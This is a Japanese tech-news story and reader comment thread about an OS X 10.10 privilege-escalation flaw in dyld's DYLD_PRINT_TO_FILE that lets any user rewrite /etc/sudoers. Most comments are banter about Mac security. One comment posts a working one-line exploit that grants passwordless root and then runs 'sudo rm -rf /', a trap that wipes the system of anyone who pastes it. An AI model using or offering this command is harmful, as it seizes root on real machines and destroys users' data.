OS X 10.10.xに権限昇格の脆弱性、sudoersファイルを任意のユーザーが書き換え可能 44
ストーリー by hylom
これはひどい 部門より
これはひどい 部門より
OS X 10.10.xで権限昇格を行える脆弱性が発見された。ダイナミックリンカ「dyld」および環境変数「DYLD_PRINT_TO_FILE」の設定を悪用することで、任意のファイルをオープンしたり、任意の場所にファイルを作成して書き込みができてしまうという(ZDNet Japan)。
The Hacker Newsにこれを悪用した操作の例が紹介されているが、たとえば/etc/sudoersファイルを改ざんして一般ユーザーにroot権限を与えることを許す、といったことができるようだ。
Macは安全です (スコア:1, すばらしい洞察)
アンチウィルスソフトが必要でノロノロのWindowsと違って、Macはいつでも安全でスマートです
Re:Macは安全です (スコア:5, おもしろおかしい)
おっしゃるとおりです。
> ダイナミックリンカ「dyld」および環境変数「DYLD_PRINT_TO_FILE」の設定を悪用することで
悪用しなけりゃいいじゃないですか。
包丁を悪用したら人を殺せるからなんだって話ですよね。
こういう悪質なFUDタレコミを取り上げるのはやめていただきたいです。
なによりAppleとそのユーザに対して失礼ですよ。
Re: (スコア:0)
包丁で人を殺すこととか、コンピュータウィルスを作ることしか頭に無いような悪人に言ってやってくださいな。
権限昇格というのは、別に、凝った自爆の仕方を見つけたった、というだけではないですよ。
ユーザがうっかりウィルスの実行ファイルを実行してしまったときの被害が超拡大しまっせ、という話ですよ。
まあ、そんなふうにウィルスを実行しちゃうのも自爆の内だけど、最近のウィルスのトレンドはその辺なので。
Re: (スコア:0)
さすが宗教#2852671が
ネタなのかマジなのか区別がつかん
Re: (スコア:0)
#2852648の自作自演だろ。
ヒマな人生送ってる奴ってうらやましいな。
Re:Macは安全です (スコア:1)
> ヒマな人生送ってる奴ってうらやましいな。
安心してください。
スラド見に来てるあなたも、十分にヒマな人生を送ってますよ。
Re: (スコア:0)
信じないからウイルスに感染するんですよ!
Re: (スコア:0)
面白くもないネタをいつまでも続けるのは、痴呆の前段階だよお爺ちゃん。
Re: (スコア:0)
面白いかどうかは人それぞれ。
Re: (スコア:0)
ネタにマジレスしちゃう人は半年のみならず一生ROMっててくださいね。
Re:Macは安全です (スコア:1)
ベタな出涸らしネタにマジレスされたくなきゃ
もうチラシの裏にでも書いてたらいいんじゃないかな
Re: (スコア:0)
安全じゃないですよ。
Re: (スコア:0)
Windowsって毎月大量の不具合見つかってパッチ配ってるのに全然改善してないしね
Re:Macは安全です (スコア:1)
Macは毎月大量の不具合を見つけられないから不安定なんですよね
Re:Macは安全です (スコア:1)
そうだね。Macは見つかっても放置だしね。
本ストーリーのネタにマジレススレはこちらです (スコア:0)
T/Oです
どうでもいいけど (スコア:1)
"rootpipe"脆弱性がまだ対応されてないバージョンが沢山あるんだけどね。
Macの脆弱性は金にならないからまだまだ未発表の脆弱性があるんじゃないかな。
まだSafariからリモートでできるとかじゃないのでましなのでは。
あとはiCloudとBonjourを破ればどこの誰のでも完全に乗っ取り放題か...
あーMacはなんて安全なんだろう。
さすが BSD だ (スコア:0)
Linux や Windows に比べてこの程度で済んでいるのは大したものだ。
Re: (スコア:0)
ほんと致命傷で済んで良かった。
Re: (スコア:0)
ほんと即死で済んで良かった。苦しむ間もなかっただろう。
ベータで修正したのが元に戻るって (スコア:0)
近年のAppleはますますおかしくなってきていないかな?そろそろ足下を見直す時期に来ているのでは。
Re: (スコア:0)
大多数が使っている安定版では直っていない
反論としては不十分じゃない?。
安定板での修正スケジュールがないと弱いよ。
Re: (スコア:0)
ベータで直っていたものが「元に戻った」という言説に対する反論だからこれで十分
Re: (スコア:0)
あぁ、タイトルに対する、10.10では一度も直ったことないから戻ってないよって意味でしたか。
> Appleはますますおかしくなってきていないかな?
に対する、「そんなことないよ、安定版は直ってないけどベータ版で直ってんだろ」って意味かと取ってました。
Re: (スコア:0)
10.10が修正されないなら、10.11の安定版リリース時点(新OS自体がパッチ相当)と言われなきやわからない。
これって・・ (スコア:0)
これって普段から管理者権限のあるユーザーで使っている自分には関係ない?
そんな脆弱性使わなくても、sudo使えるし
Mac OS Xをサーバーとして使っていて、sshなどで入れるようにしてた場合は問題だよね。
もしくは、1台のMacを複数の人で使いまわししてた時?
直接ハード触れる場合は、もっと別の問題があるような気がするけどwww
Re:これって・・ (スコア:2)
多分勘違いしていると思われます。sudo はユーザのパスワードを確認してから管理者 (root) 権限を得るためのコマンドです。もしあなたが普段から管理者 (root) 権限を使用しているなら、そもそも sudo を使用する必要はありません。
しかし、もし /etc/sudoers 中の
のコメントアウトを外しているなどしているなら、パスワードの確認なしに root 権限が得られるのでこの限りではありませんが。
Re: (スコア:0)
え?Macで管理者権限をつけると、wheelユーザーと同じように、sudoでパスワード聞かれますよ。
もちろん、アプリのインストールでもパスワード聞かれるし
Linuxのrootのようなものではないです(そしたら危ないよ)そこはWindowsみたいに危なくないwww
Macの管理者って権限のないフォルダーにはアクセスできないから(sudo使えばできちゃうけど)
wheelグループに入ったユーザーって意味に近いものかと。
Re:これって・・ (スコア:1)
管理者=rootと思っているかどうかで話が食い違っている気がする。WindowsもBuiltin AdministratorはUAC承認不要だけど管理者権限を持ったユーザーがUAC承認不要なわけではないし。
わんらいなー (スコア:0)
echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo rm -rf /
Re:わんらいなー (スコア:4, すばらしい洞察)
rm -rf /
以外にしろよ。
Re: (スコア:0)
$ echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo pwd
Traceback (most recent call last):
File "", line 1, in
OSError: [Errno 9] Bad file descriptor
Password:
ならこの脆弱性なし?
また環境変数か。。 (スコア:0)
これ、アクセス権を持たせた方がいいんじゃないの?
やると、影響範囲がでかいなぁ。。
Re: (スコア:0)
それ、WindowsもLinuxもMacも関係なく、アプリケーションの作りと更新の問題ですよね。
Re: (スコア:0)
やっぱaptかrpmかyumのようなシステムが必要。ポタージュはいらない
Re: (スコア:0)
> なんでもかんでも静的リンクしちゃうようなプログラムでも自前でアップデート機構を作らないといけない
へえ、LinuxやMacだと脆弱性のあるライブラリを使っていても、静的にリンクしていたらOSが勝手に
アップデートしてくれるんだあ。すごいなあ。
Re: (スコア:0)
いや同様の条件ってLinuxだろうがBSDだろうがMacだろうが普通に起きますよね?
一体何が言いたいのかがわかりません
Re: (スコア:0)
> 一体何が言いたいのかがわかりません
つ 「俺はMSが嫌い」
Re: (スコア:0)
>一体何が言いたいのかがわかりません
「俺は無知」
Re: (スコア:0)
なんでもかんでも静的リンクするのをウリにしているGo言語をディスるのはやめるんだ。